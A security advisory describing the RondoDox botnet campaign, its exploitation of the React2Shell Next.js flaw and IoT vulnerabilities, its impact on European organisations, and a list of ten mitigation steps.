RondoDox is a sophisticated botnet campaign active since early 2025 that targets Internet of Things (IoT) devices and web applications by exploiting multiple vulnerabilities, most notably the critical React2Shell flaw (CVE-2025-55182) in React Server Components and Next.js, which allows unauthenticated remote code execution. The vulnerability has a CVSS score of 10.0, indicating its critical severity. The campaign progressed through three phases: initial reconnaissance and manual scanning (March-April 2025), mass vulnerability probing of popular web platforms like WordPress, Drupal, and Struts2, and IoT devices such as Wavlink routers (April-June 2025), followed by large-scale automated exploitation (July-December 2025). The attackers scan for vulnerable Next.js servers and deploy multiple payloads including cryptocurrency miners, a Mirai botnet variant, and a botnet loader named "/nuts/bolts" that removes competing malware and establishes persistence via cron jobs. The loader continuously monitors running processes, killing any non-whitelisted ones approximately every 45 seconds to prevent reinfection by other malware. According to Shadowserver Foundation data, about 90,300 instances remain vulnerable globally, with 4,300 in Germany and 2,800 in France, making Europe a significant target region. The botnet's modular nature and use of multiple zero-day and N-day vulnerabilities, including CVE-2023-1389 and CVE-2025-24893, demonstrate its evolving threat landscape. The campaign's impact includes hijacking device resources for cryptomining, launching distributed denial-of-service (DDoS) attacks, and potentially compromising data confidentiality and integrity. The threat actors' ability to maintain persistence and remove competing malware increases the difficulty of remediation. CloudSEK and other cybersecurity firms recommend immediate patching of Next.js, segmentation of IoT devices into dedicated VLANs, deployment of Web Application Firewalls (WAFs), monitoring for suspicious process execution, and blocking known command-and-control servers to mitigate the threat.

European organizations face significant risks from the RondoDox botnet due to the widespread use of vulnerable Next.js servers and IoT devices. The exploitation can lead to unauthorized remote code execution, enabling attackers to deploy cryptocurrency miners that consume computational resources, degrade system performance, and increase operational costs. The presence of Mirai botnet variants raises the risk of large-scale DDoS attacks originating from compromised devices, potentially disrupting critical services and infrastructure. The botnet's capability to remove competing malware and maintain persistence complicates detection and remediation efforts, increasing the likelihood of prolonged compromise. Confidentiality may be impacted if attackers leverage access to exfiltrate sensitive data or pivot within networks. Integrity risks arise from unauthorized code execution and potential manipulation of web applications or IoT device configurations. Availability is threatened by resource exhaustion and potential service outages. The campaign's targeting of popular web platforms and IoT devices used in industrial, commercial, and public sectors in Europe elevates the strategic risk, particularly for organizations relying on Next.js-based applications and connected devices. The ongoing nature of the campaign and the presence of thousands of vulnerable instances in Germany and France underscore the urgency for European entities to act swiftly to mitigate exposure.

1. Immediately update all Next.js installations to the latest patched versions that address CVE-2025-55182 to eliminate the primary attack vector. 2. Conduct comprehensive asset inventories to identify all IoT devices and web servers running vulnerable software, prioritizing those exposed to the internet. 3. Segment IoT devices into dedicated VLANs with strict access controls to limit lateral movement and contain potential infections. 4. Deploy and fine-tune Web Application Firewalls (WAFs) to detect and block exploitation attempts targeting React2Shell and related vulnerabilities. 5. Implement continuous monitoring of process execution on critical servers and IoT devices to detect and alert on suspicious activities such as unauthorized process termination or new cron jobs. 6. Block known command-and-control (C2) infrastructure associated with RondoDox using threat intelligence feeds and network-level controls. 7. Remove any detected instances of competing malware and residual artifacts from prior infections to prevent persistence mechanisms from remaining active. 8. Harden IoT device configurations by disabling unnecessary services, changing default credentials, and applying vendor security updates. 9. Conduct regular penetration testing and vulnerability scanning focused on web applications and IoT environments to proactively identify and remediate weaknesses. 10. Educate IT and security teams on the specific indicators of compromise related to RondoDox to improve detection and response capabilities.